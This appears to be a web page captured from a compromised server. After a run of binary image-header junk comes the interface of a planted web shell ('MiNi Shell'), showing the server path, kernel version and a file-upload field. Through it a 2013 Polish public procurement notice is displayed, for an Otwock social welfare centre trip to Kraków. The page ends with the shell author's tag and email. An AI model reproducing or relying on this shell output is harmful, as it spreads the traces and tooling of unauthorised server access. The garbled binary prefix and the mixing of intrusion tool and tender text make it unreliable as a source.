JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130523/201562-N-2013.html

<p class="kh_header"><b>Otwock: Przeprowadzenie Wyjazdu konsultacyjno - integracyjnego dla uczestników i osób z ich otoczenia  w ramach projektu systemowego Uwierz w siebie - Ty też potrafisz współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki
.</b><br>
<b>Numer ogłoszenia: 201562 - 2013; data zamieszczenia: 23.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Sosnowa 4, 05-400 Otwock, woj. mazowieckie, tel. 0-22 779 36 32, 779 36 92, faks 0-22 779 36 32, 779 36 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.otwock.pl ,  www.opsotwock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie Wyjazdu konsultacyjno - integracyjnego dla uczestników i osób z ich otoczenia  w ramach projektu systemowego Uwierz w siebie - Ty też potrafisz współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki
..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie Wyjazdu konsultacyjno - integracyjnego dla uczestników i osób z ich otoczenia w ramach projektu systemowego Uwierz w siebie - Ty też potrafisz. Zamawiający wymaga, aby oferowana przez Wykonawcę usługa w ramach niniejszego zamówienia spełniała następujące kryteria ogólne i szczegółowe: Kryteria ogólne: 1.	W ramach przedmiotu Zamówienia  warsztaty psychologiczne zapewnia Zamawiający. 2.	Ośrodek powinien posiadać odpowiednią bazę lokalową i zaplecze techniczne do sprawnego przeprowadzenia warsztatów z psychologiem i realizacji  pobytu w ramach niniejszego postępowania. 3.	Sala wykładowa powinna być dostosowana do ilości osób uczestniczących w warsztatach prowadzonych przez psychologa  w łącznym wymiarze 6 godzin zegarowych. 4.	Ośrodek powinien być zlokalizowany w  granicach administracyjnych miasta Krakowa.  5.	W ramach przedmiotu zamówienia Wykonawca zobowiązany jest zapewnić: a.	dojazd w obie strony (autokar klimatyzowany z pasami bezpieczeństwa), b.	przejazdy autokarem do miejsc odwiedzanych i podczas wycieczek krajoznawczych c.	zakwaterowanie w pokojach jednoosobowych  lub  jeden pokój dla całej rodziny, orientacyjny wykaz pokoi ; 1- osobowe 6 pokoi, 2-osobowe 2 pokoje, 3-osobowe 4 pokoje, 4- osobowe 6 pokoi, 6-osobowe 2 pokoje:  pokoje z pełnym węzłem sanitarnym wyposażone w  telewizor,  czajnik bezprzewodowy, wskazane zakwaterowanie całej grupy w jednym budynku. d.	całodzienne wyżywienie - śniadanie, obiad (dwudaniowy + deser), podwieczorek, kolacja (w tym całodobowy dostęp do napojów chłodzących),  e.	ubezpieczenie NNW wszystkich Uczestników,  f.	zorganizowanie czasu wolnego (3 wycieczki autokarowe)  g.	zorganizowanie wyjazdu do parku wodnego h.	zorganizowanie imprezy integracyjnej w formie grilla i wieczorku tanecznego i.	serwis kawowy (kawa, herbata, cukier, mleko, napoje chłodzące i ciastka) w czasie realizowanych działań projektu, 
j.	zapewnienie sali dla zorganizowania zajęć świetlicowych dla dzieci. 6.	Z uwagi na współfinansowanie projektu ze środków Europejskiego Funduszu Społecznego, Wykonawca jest zobowiązany umożliwić Zamawiającemu odpowiednie oznaczenie sal zajęciowych. Kryteria szczegółowe: 1.	Miejsce realizacji wyjazdu konsultacyjnego: ośrodek, pensjonat, hotel położony w granicach administracyjnych Krakowa , obiekt ogrodzony. 2.	Termin realizacji usługi :  od dnia 29.06.2013 r. do dnia 03.07.2013 r.  3.	Ilość uczestników: 24 osoby dorosłe oraz  31 dzieci:  w wieku  do 4  lat  2 osoby, w wieku powyżej 4 lat- 29 osób, a także 3 osoby kadry zamawiającego pobyt bezpłatny. Razem 58 osób. 4.	Wykonawca zapewni transport 58 osób: 27 osób dorosłych i 31 dzieci  z Otwocka do Krakowa oraz przywóz uczestników z ośrodka do Otwocka po zakończeniu pobytu. 5.	W ramach przedmiotu zamówienia Wykonawca jest zobowiązany zapewnić: a)	Salę wykładową do odbycia warsztatów z psychologiem b)	Salę do zabaw świetlicowych dla dzieci c)	zakwaterowanie 58 osób w pokojach jednoosobowych lub jeden pokój dla całej rodziny  w jednym budynku z pełnym węzłem sanitarnym wyposażonym, telewizor,  czajnik bezprzewodowy, zakwaterowanie w pokojach jednoosobowych  lub  jeden pokój dla całej rodziny, orientacyjny wykaz pokoi ; 1- osobowe 6 pokoi, 2-osobowe 2 pokoje, 3-osobowe 4 pokoje, 4- osobowe 6 pokoi, 6-osobowe 2 pokoje d)	pełne wyżywienie dla 58 osób w trakcie całego pobytu w ośrodku, serwowane w stołówce położonej na terenie ośrodka, z uwzględnieniem potrzeb żywieniowych dzieci,  składające się ze:  - śniadania w formie szwedzkiego stołu składającego się z:posiłku mlecznego , minimum jednego dania ciepłego, przekąsek zimnych, warzyw lub sałatek warzywnych, pieczywa jasnego i ciemnego, napojów gorących i zimnych, wędlin, serów, - obiadu dwudaniowego z deserem, - podwieczorku w postaci owoców , ciastka drożdżowego                                         
- kolacji składającej się z: minimum jednego dania ciepłego, przekąsek zimnych, warzyw lub sałatek warzywnych, pieczywa jasnego i ciemnego, napojów gorących i zimnych, e)	serwis kawowy dla 20 osób uzupełniany w trakcie warsztatów z psychologiem , składający się z kawy, herbaty, mleka, cukru i napojów zimnych takich jak: woda mineralna, soki owocowe, po ok. 0,5 l dziennie na osobę oraz ciastek suchych i słonych paluszków,  f)	bezpłatną całodobową opiekę medyczną, g)	opłacenie ewentualnej taksy klimatycznej dla wszystkich uczestników              
6.	możliwość uczestniczenia w trzech wycieczkach autokarowych krajoznawczo-edukacyjnych, 1/ do Zakopanego, 2/do Kalwarii Zebrzydowskiej i  Wadowic z wyżywieniem,3/Wieliczka -kopalnia soli  ponadto umożliwienie  zwiedzanie starego miasta w Krakowie.  W cenie oferty należy uwzględnić wszelkie koszty związane z organizacją wycieczki, w tym również cenę biletów wstępu do odwiedzanych obiektów i dóbr kultury wraz z usługą przewodnika. W przypadku organizacji wycieczek krajoznawczo - edukacyjnych uczestnicy nie mogą być dołączeni do innej grupy.
7.	Ubezpieczenia NNW wszystkich uczestników wyjazdu konsultacyjnego. 8.	Ponadto Wykonawca zobowiązany jest do: a)	dokonania rekompensaty za śniadanie w dniu rozpoczęcia pobytu w ośrodku  w formie posiłku na postoju w trakcie podróży, dokonania rekompensaty za kolację w dniu zakończenia pobytu w ośrodku w formie zabezpieczenia suchego prowiantu na czas podróży powrotnej; 9.   Proponowany minimalny program i harmonogram realizacji przedmiotu zamówienia: 29.06.2013 - 7,00 - wyjazd z Otwock, 14,00 - przyjazd do Krakowa, 14,30- obiad, 15,00 - 18,00 warsztaty  z psychologiem, 18,30 - kolacja; 30.06.2013 - 8,00 - śniadanie, 9,00 - 12,00  warsztaty z psychologiem, 13,00 - obiad, 13,30 - 18,00  - atrakcja turystyczna, 18,30  kolacja grill; 01.07.2013 - 8,00 śniadanie, 8,30 - 13,00 - atrakcja turystyczna, 13,30 - obiad, 14,00 - 18,00 - atrakcja turystyczna, 18,30 - kolacja, 19,00 - 20,30 pobyt w parku wodnym
02.07.2013, 8,00 - śniadanie, 8,30 - Wyjazd do Zakopanego, 13,30 - obiad w Zakopanem, 14,00 - pobyt w Zakopanem, 18,30 - kolacja w Krakowie, 19,00- 20,00 wieczorek taneczny. 03.07.2013 - 8,00 - śniadanie, 8,30 - wyjazd do Wieliczki, 9,00 - zwiedzanie Wieliczki, 13,30 - obiad w Wieliczce lub w trasie powrotnej, 19,00 - powrót do Otwock. 10 .Minimalny program musi zawierać następujące elementy: zwiedzania Krakowa z przewodnikiem:  Wzgórze Wawelskie, /Dziedziniec Zamku Królewskiego , Katedra, Groby i Krypty Królewskie, Dzwon Zygmunta , Spacer Drogą Królewska - ul. Kanonicza, ul. Franciszkańska, Pałac Biskupi - okno papieskie, Rynek Główny  z Sukiennicami, Kościół Mariacki -ołtarz Wita Stwosza,, Brama Floriańska i Barbakan , Jaskinia smoka wawelskiego, zwiedzania Zakopanego z przewodnikiem; Muzeum TPN, ul. Krupówki, Kościółek i Cmentarz Zasłużonych na Pęksowym  Brzyzku , Wielka Krokiew - zwiedzanie skoczni, Sanktuarium Matki Boskiej Fatimskiej, Wjazd Kolejką na Kasprowy Wierch, Wjazd kolejką na Gubałówkę, wyjazd do Kalwarii Zebrzydowskiej i Wadowic, wyjazd do Wieliczki..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 92.33.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje  - co najmniej 3 (trzy) kompleksowe usługi polegające na organizacji i przeprowadzeniu wyjazdów, wraz z transportem, wyżywieniem, noclegami oraz organizacją czasu wolnego.

W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć Wykaz wykonanych lub wykonywanych usług sporządzony według wzoru stanowiącego Załącznik nr 6 do SIWZ  oraz  załączyć dowody potwierdzające czy usługi zostały wykonywane lub są wykonywane należycie.

 W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja w zakresie wiedzy i doświadczenia - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu dot. dysponowania odpowiednim potencjałem technicznym nastąpi, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował: 
pomieszczeniami - salą  konferencyjno- szkoleniową, mieszcząca co najmniej 20 osób,   pomieszczeniami - salą do zabaw świetlicowych i ruchowych dla  co najmniej 30 dzieci,
pokojami dla grupy 58 osób, środkiem transportu, wyposażonym w klimatyzację i pasy bezpieczeństwa przystosowanym do przewozu osób

W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest załączyć do oferty Wykaz zaplecza technicznego Załącznik nr 8 do SIWZ  wraz  z informacją o podstawie dysponowania zasobami niezbędnymi do realizacji zamówienia.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja w zakresie dysponowania odpowiednim potencjałem technicznym  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W części dotyczącej osób zdolnych do wykonania zamówienia ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie wykazania, że Wykonawca dysponuje lub będzie dysponować podczas realizacji zamówienia osobami zdolnymi do wykonania zamówienia na czas osobami posiadającymi następujące kwalifikacje zawodowe, doświadczenie i wykształcenia:
1.Pilot wycieczki/przewodnik minimum: wykształcenie średnie, roczny staż w zakresie organizacji wycieczek,  2. Kierowca autokaru: aktualne uprawnienia do przewozu osób autokarem.

W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć Wykaz osób  sporządzony według wzoru stanowiącego Załącznik nr 7 do SIWZ - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja w zakresie osób zdolnych do wykonania zamówienia  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę  posiadania opłaconej  polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Polisa lub inny dokument świadczący o posiadaniu przez Wykonawcę ubezpieczenia powinny być ważne w dniu składania ofert.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja w zakresie sytuacji ekonomicznej i finansowej  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp sporządzonej zgodnie ze wzorem stanowiącym Załącznik Nr 4 do SIWZ lub Informację o tym, że nie należy do grupy kapitałowej zgodnie ze wzorem stanowiącym Załącznik Nr 5 do SIWZ. W zależności od stanu faktycznego Wykonawca składa stanowiący wzór Załącznik Nr 4 do SIWZ lub wzór stanowiący Załącznik Nr 5 do SIWZ. 2. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o
udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość dokonania zmiany umowy w formie pisemnej, w szczególności w zakresie: 1)	zmiany terminu realizacji przedmiotu umowy w przypadku wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia.
W przypadku zmiany terminu realizacji przedmiotu umowy, termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności, 2)	dokonanie zmiany w kadrze z powodu śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych, których nie można było przewidzieć w chwili podpisania umowy.  W przypadku zmiany w kadrze Wykonawca zobowiązany jest przedstawić kandydaturę osoby o kwalifikacjach równorzędnych lub wyższych od tych, jakie posiadała osoba wykonująca zamówienie. Zmiana kadry może nastąpić wyłącznie wtedy, gdy jest korzystna dla Zamawiającego i Zamawiający wyrazi na nią zgodę, 3)	zmiany ceny za wykonaną usługę, proporcjonalnie do wielkości wykonania przedmiotu zamówienia. Kwota zmiany wynagrodzenia będzie odpowiadała kwocie przedstawionej w formularzu ofertowym za 1 (jednego) uczestnika, w zależności od ostatecznej liczby osób. 4)	zmiany uczestnika wyjazdu konsultacyjnego w przypadku rezygnacji bądź wykreślenia osoby z listy uczestników wyjazdu - Zamawiający ma wówczas prawo skierować inną osobę na jej miejsce.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opsotwock.pl,   www.bip.otwock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Otwocku,
ul. Sosnowa 4
05-400 Otwock,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 12:00, miejsce: Ośrodek Pomocy Społecznej w Otwocku,
ul. Sosnowa 4
05-400 Otwock,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowanie jest w  ramach  projektu systemowego Uwierz w siebie - Ty też potrafisz współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com